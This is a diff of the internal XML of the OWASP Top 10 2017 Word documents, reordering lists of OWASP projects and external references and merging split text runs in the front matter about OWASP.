+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>NB: This section is not part of RC2, but might make it into the Golden Master. Comments welcome.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="151" w:name="owasp-flagship-projects-documents"/>
       <w:bookmarkEnd w:id="151"/>
+      <w:r>
+        <w:t>OWASP Flagship Projects (Documents)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>NB: This section is not part of RC2, but might make it into the Golden Master. Comments welcome.</w:t>
-      </w:r>
+        <w:t>The following OWASP Flagship documentation projects are most likely t</w:t>
+      </w:r>
+      <w:r>
+        <w:t>o be useful to users/adopters of this standard:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="73"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId216">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Cheat Sheets</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="73"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId217">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Proactive Controls</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="73"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId218">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Application Security Verification Standard</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="73"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId219">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Testing Guide</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="73"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId220">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Privacy Top 10 Risks</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="73"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId221">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Mobile Top 10 Risks</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="73"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId222">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP SAMM</w:t>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="152" w:name="owasp-flagship-projects-documents"/>
+      <w:bookmarkStart w:id="152" w:name="owasp-flagship-projects-tools"/>
       <w:bookmarkEnd w:id="152"/>
       <w:r>
-        <w:t>OWASP Flagship Projects (Documents)</w:t>
+        <w:t>OWASP Flagship Projects (Tools)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15374,7 +15510,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The following OWASP Flagship documentation projects are most likely to be useful to users/adopters of this standard:</w:t>
+        <w:t>The following projects are highly likely to be useful to adopters of the OWASP Top 10:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15385,12 +15521,12 @@
           <w:numId w:val="74"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId217">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Cheat Sheets</w:t>
+      <w:hyperlink r:id="rId223">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP AppSensor</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -15402,12 +15538,12 @@
           <w:numId w:val="74"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId218">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Proactive Controls</w:t>
+      <w:hyperlink r:id="rId224">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Dependency Check</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -15419,12 +15555,18 @@
           <w:numId w:val="74"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId219">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Application Security Verification Standard</w:t>
+      <w:hyperlink r:id="rId225">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP mod_security WAF Core</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> Rule Set</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -15436,12 +15578,12 @@
           <w:numId w:val="74"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId220">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Testing Guide</w:t>
+      <w:hyperlink r:id="rId226">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Open Web Testing Framework</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -15453,46 +15595,12 @@
           <w:numId w:val="74"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId221">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Privacy Top 10 Risks</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="74"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId222">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Mobile Top 10 Risks</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="74"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId223">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP SAMM</w:t>
+      <w:hyperlink r:id="rId227">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP ZAP</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -15500,10 +15608,10 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="153" w:name="owasp-flagship-projects-tools"/>
+      <w:bookmarkStart w:id="153" w:name="owasp-lab-projects"/>
       <w:bookmarkEnd w:id="153"/>
       <w:r>
-        <w:t>OWASP Flagship Projects (Tools)</w:t>
+        <w:t>OWASP Lab Projects</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15511,7 +15619,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The following projects are highly likely to be useful to adopters of the OWASP Top 10:</w:t>
+        <w:t>These projects are working towards Flags</w:t>
+      </w:r>
+      <w:r>
+        <w:t>hip status, and might well achieve it before 2020.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15522,12 +15633,12 @@
           <w:numId w:val="75"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId224">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP AppSensor</w:t>
+      <w:hyperlink r:id="rId228">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Developer Guide</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -15539,12 +15650,12 @@
           <w:numId w:val="75"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId225">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Dependency Check</w:t>
+      <w:hyperlink r:id="rId229">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Juice Shop</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -15556,52 +15667,28 @@
           <w:numId w:val="75"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId226">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP mod_security WAF Core</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> Rule Set</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="75"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId227">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Open Web Testing Framework</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="75"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId228">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP ZAP</w:t>
+      <w:hyperlink r:id="rId230">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Secure Contract Annex</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">For a full list of projects, please see </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId231">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>OWASP Projects</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -15609,10 +15696,13 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="154" w:name="owasp-lab-projects"/>
+      <w:bookmarkStart w:id="154" w:name="external-references"/>
       <w:bookmarkEnd w:id="154"/>
       <w:r>
-        <w:t>OWASP Lab Projects</w:t>
+        <w:t>External refe</w:t>
+      </w:r>
+      <w:r>
+        <w:t>rences</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15620,10 +15710,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>These projects are working towards Flags</w:t>
-      </w:r>
-      <w:r>
-        <w:t>hip status, and might well achieve it before 2020.</w:t>
+        <w:t>The following external sites reference the OWASP Top 10, and would likely be relevant to adopters.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15634,12 +15721,12 @@
           <w:numId w:val="76"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId229">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Developer Guide</w:t>
+      <w:hyperlink r:id="rId232">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>MITRE Common Weakness Enumeration</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -15651,12 +15738,18 @@
           <w:numId w:val="76"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId230">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Juice Shop</w:t>
+      <w:hyperlink r:id="rId233">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>PCI Security Stand</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>ards Council</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -15668,101 +15761,7 @@
           <w:numId w:val="76"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId231">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Secure Contract Annex</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">For a full list of projects, please see </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId232">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>OWASP Projects</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="155" w:name="external-references"/>
-      <w:bookmarkEnd w:id="155"/>
-      <w:r>
-        <w:t>External refe</w:t>
-      </w:r>
-      <w:r>
-        <w:t>rences</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The following external sites reference the OWASP Top 10, and would likely be relevant to adopters.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="77"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId233">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>MITRE Common Weakness Enumeration</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="77"/>
-        </w:numPr>
-      </w:pPr>
       <w:hyperlink r:id="rId234">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>PCI Security Stand</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>ards Council</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="77"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId235">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -15827,9 +15826,9 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="B0475242"/>
+    <w:nsid w:val="2DD45B24"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="5D2855FA"/>
+    <w:tmpl w:val="A842575C"/>
     <w:lvl w:ilvl="0">
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="•"/>
@@ -16146,10 +16145,7 @@
   <w:num w:numId="76">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="77">
-    <w:abstractNumId w:val="0"/>
-  </w:num>
-  <w:numIdMacAtCleanup w:val="77"/>
+  <w:numIdMacAtCleanup w:val="76"/>
 </w:numbering>
 </file>
 
@@ -17722,7 +17718,7 @@
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="002452CB"/>
+    <w:rsid w:val="00C06A73"/>
     <w:pPr>
       <w:spacing w:after="100"/>
     </w:pPr>
@@ -18089,7 +18085,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6B08B217-2F85-4001-864B-258E8DEC9040}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{410CEF20-0FF2-428A-950D-7921AA26B03B}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/2017/OWASP-Top-10-2017-en.docx
+++ b/2017/OWASP-Top-10-2017-en.docx
@@ -6,6 +6,8 @@
       <w:pPr>
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -57,8 +59,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="owasp-top-10-2017"/>
-      <w:bookmarkEnd w:id="0"/>
+      <w:bookmarkStart w:id="1" w:name="owasp-top-10-2017"/>
+      <w:bookmarkEnd w:id="1"/>
       <w:r>
         <w:t>OWASP Top 10 2017</w:t>
       </w:r>
@@ -83,8 +85,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="golden-master"/>
-      <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkStart w:id="2" w:name="golden-master"/>
+      <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:t>Golden Master</w:t>
       </w:r>
@@ -267,21 +269,21 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="gm-golden-master"/>
-      <w:bookmarkStart w:id="3" w:name="_Toc498375150"/>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkStart w:id="3" w:name="gm-golden-master"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc498375150"/>
+      <w:bookmarkEnd w:id="3"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>GM Golden Master</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="important-notice"/>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkStart w:id="5" w:name="important-notice"/>
+      <w:bookmarkEnd w:id="5"/>
       <w:r>
         <w:t>Important Notice</w:t>
       </w:r>
@@ -290,8 +292,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="request-for-comments"/>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkStart w:id="6" w:name="request-for-comments"/>
+      <w:bookmarkEnd w:id="6"/>
       <w:r>
         <w:t>Request for Comments</w:t>
       </w:r>
@@ -357,10 +359,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>If risk factors (exploitability, p</w:t>
-      </w:r>
-      <w:r>
-        <w:t>revalence, detectability, impact) are concise and accurate</w:t>
+        <w:t>If risk factors (exploitability, prevalence, detectability, impact) are concise and accurate</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -408,10 +407,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>CWE li</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nks must cover the content discussed in each risk. Do we need to add, change, or remove CWEs? Does the CWE need updating? If so, we have a very small window to work with MITRE to make it better</w:t>
+        <w:t>CWE links must cover the content discussed in each risk. Do we need to add, change, or remove CWEs? Does the CWE need updating? If so, we have a very small window to work with MITRE to make it better</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -419,10 +415,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>We strongly urge for any corrections or issues to be logged at</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> GitHub:</w:t>
+        <w:t>We strongly urge for any corrections or issues to be logged at GitHub:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -459,10 +452,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Andrew van der Sto</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ck</w:t>
+        <w:t>Andrew van der Stock</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -508,17 +498,17 @@
           <w:numId w:val="1"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="toc"/>
-      <w:bookmarkStart w:id="7" w:name="_Toc498375151"/>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkStart w:id="7" w:name="toc"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc498375151"/>
+      <w:bookmarkEnd w:id="7"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>TOC</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:bookmarkStart w:id="8" w:name="o-about-owasp"/>
-    <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:bookmarkStart w:id="9" w:name="o-about-owasp"/>
+    <w:bookmarkEnd w:id="9"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="TOC1"/>
@@ -2242,13 +2232,11 @@
         <w:lastRenderedPageBreak/>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
-      <w:bookmarkStart w:id="9" w:name="_Toc498375152"/>
-      <w:bookmarkStart w:id="10" w:name="_GoBack"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc498375152"/>
+      <w:r>
+        <w:t>O About OWASP</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="10"/>
-      <w:r>
-        <w:t>O About OWASP</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2265,10 +2253,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nd APIs that can be trusted.</w:t>
+        <w:t>The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications and APIs that can be trusted.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2445,10 +2430,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>We advocate approaching application security as a people, process, and techn</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ology problem, because the most effective approaches to application security require improvements in these areas.</w:t>
+        <w:t>We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in these areas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2456,10 +2438,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective informatio</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. OWASP produces many types of materials in a collaborative, transparent, and open way.</w:t>
+        <w:t>OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. OWASP produces many types of materials in a collaborative, transparent, and open way.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2467,13 +2446,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>The OWASP Found</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ation is the non-profit entity that ensures the project's long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP board, chapter leaders, project leaders, and project members. We support innovative security research wit</w:t>
-      </w:r>
-      <w:r>
-        <w:t>h grants and infrastructure.</w:t>
+        <w:t>The OWASP Foundation is the non-profit entity that ensures the project's long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP board, chapter leaders, project leaders, and project members. We support innovative security research with grants and infrastructure.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2550,10 +2523,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>Copyright © 2003-2017 The OWASP Foundation. This document is released under the Creative Commons Attribution Share-Alike 4.0 license. For any reuse or distribution, you must make it clear t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o others the license terms of this work.</w:t>
+        <w:t>Copyright © 2003-2017 The OWASP Foundation. This document is released under the Creative Commons Attribution Share-Alike 4.0 license. For any reuse or distribution, you must make it clear to others the license terms of this work.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2572,13 +2542,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Insecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our software becomes increasingly critical, complex, and connected, the difficulty of achie</w:t>
-      </w:r>
-      <w:r>
